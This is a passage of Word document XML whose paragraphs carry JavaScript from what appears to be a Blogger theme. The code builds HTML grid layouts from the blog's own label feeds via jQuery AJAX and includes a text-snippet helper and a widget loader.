    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;/div&gt;&lt;!--/row--&gt;&lt;/div&gt;&lt;!--colsm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;!--max are 5 --&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //END OF [GRID 1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      case "grid-2":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        switch(i){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-8"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-4"&gt;&lt;div class="row"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--row--&gt;&lt;/div&gt;&lt;!--/colsm4--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--row--&gt;&lt;/div&gt;&lt;!--/colsm4--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;/div&gt;&lt;!--row--&gt;&lt;/div&gt;&lt;!--/colsm4--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;!--max are 4 --&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;!--max are 4 --&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;!--max are 4 --&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //END OF [GRID 2]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      case "grid-3":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        switch(i){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="row"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/item--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--/colsm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="row"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c + '&lt;/div&gt;&lt;!--/row--&gt;&lt;/div&gt;&lt;!--/colsm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-lg-6"&gt;&lt;div class="first"&gt;&lt;div class="pthumb"&gt;&lt;div class="big" style="background:url('+ pi +')"&gt;&lt;div class="wrapper-post"&gt;&lt;div class="post-tags"&gt;&lt;a name="Post </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>related to '+lbl+'" href="'+ ll +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;div class="post-meta"&gt;&lt;div class="ptitle"&gt;&lt;h3 class="pt"&gt;&lt;a name="'+ title +'" href="'+ pu +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;div class="other-meta"&gt;&lt;span class="author-meta"&gt;&lt;a href="'+ pau +'" name="Written By '+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;a href="'+ pu +'" name="Posted at ' + time + '"&gt;'+ time +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;/div&gt;&lt;!--/row--&gt;&lt;/div&gt;&lt;!--/colsm6--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;!--max are 4 --&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;!--max are 4 --&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          default:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;!--max are 4 --&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //END OF [GRID 3]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  c = c + '&lt;/div&gt;&lt;div class=\'melesa-clear\'&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  $t.html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            });//ajax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          //snippet function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          function snip(cont, size_desc) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            return cont.replace(/&lt;.*?&gt;/gi, "").split(/\s+/).slice(0, size_desc - 1).join(" ");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          //melesa in widgets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          $('#melesawids .melesa-plugin').map(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var $t = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var lbl = $t.attr('data-label'); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var typ = $t.attr('data-type');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            typ = typ.toLowerCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            $.ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              url : "/feeds/posts/default/-/" + lbl + "?alt=json-in-script&amp;max-results=5",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              type: 'get',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              dataType: "jsonp",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              success: function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                //console.log(JSON.stringify(e));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                if(e.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  var c ='&lt;div class="mlsa-no-post"&gt;&lt;div class="mlsa-table"&gt;&lt;div class="mlsa-cell"&gt;&lt;img src="https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg"&gt;&lt;br/&gt;&lt;h3&gt;No Posts Found For Label : ' + lbl + ' &lt;/h3&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  $t.html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                //transact all data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                if(e.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  for(var k =0;k &lt; e.feed.link.length;k++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
